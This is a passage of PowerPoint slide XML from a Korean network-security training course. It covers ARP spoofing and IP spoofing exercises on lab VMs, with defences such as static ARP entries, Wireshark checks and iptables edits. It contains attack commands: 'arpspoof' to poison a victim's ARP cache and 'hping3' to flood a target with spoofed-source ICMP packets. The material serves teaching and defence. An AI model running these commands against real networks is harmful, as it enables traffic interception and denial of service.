              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –t 10.10.1.101(Target IP) 10.10.1.1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP) &amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>백그라운드 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –t 10.10.1.101 10.10.1.1 &amp;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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 사용하여 실습 서버에서 게이트웨이로 전송한 패킷들이 공격 서버로 전송되는 것을 확인</a:t>
            </a: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a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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2. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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만약</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, STORE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 안되거나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>인터넷이 상시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>안될경우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 설치방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://aka.ms/wslubuntu2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ubuntu appx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운 및 실행 및 설치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/microsoft/terminal/releases/tag/v1.11.2921.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>Msixbundle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운받아 실행 및 설치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>  </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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="화살표: 오른쪽 11">
            <a:hlinkClick r:id="rId4"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5"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2A69C149-261A-48F5-8C0A-F6D2816703B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="938893" y="1194049"/>
            <a:ext cx="4664527" cy="2926194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B942EE7C-01DF-4F2E-A21D-305BA5D3B092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="392120" y="4991272"/>
            <a:ext cx="5167987" cy="1345358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E70473-184D-4B72-9A7A-7F47F7335649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6635435" y="525587"/>
            <a:ext cx="4810893" cy="3022907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382766887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/Training/Unit/Net/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 9. ARP Spoofing -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(10.10.1.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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Wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</a:t>
            </a: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marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 패킷 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>* 지속적으로 잘못된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소가 담긴 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ARP Reply Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 보내 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>캐시를 조작하게 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a: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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -s 10.10.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>aa:bb:cc:dd:ee:ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> (MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>정적으로 설정이 되어 있는지 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -a</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a:t># check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Net/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 10. IP Spoofing</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ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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실습 서버를 대상으로 데이터 크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>바이트인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>플러딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # hping3 –a 192.168.99.11 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –d 100 10.10.1.101</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2. Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>192.168.99.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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2. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Net/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 10. IP Spoofing -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소 확인</a:t>
            </a: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2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 수정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/iptables</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iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>수정한 값을 적용하기 위해 서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
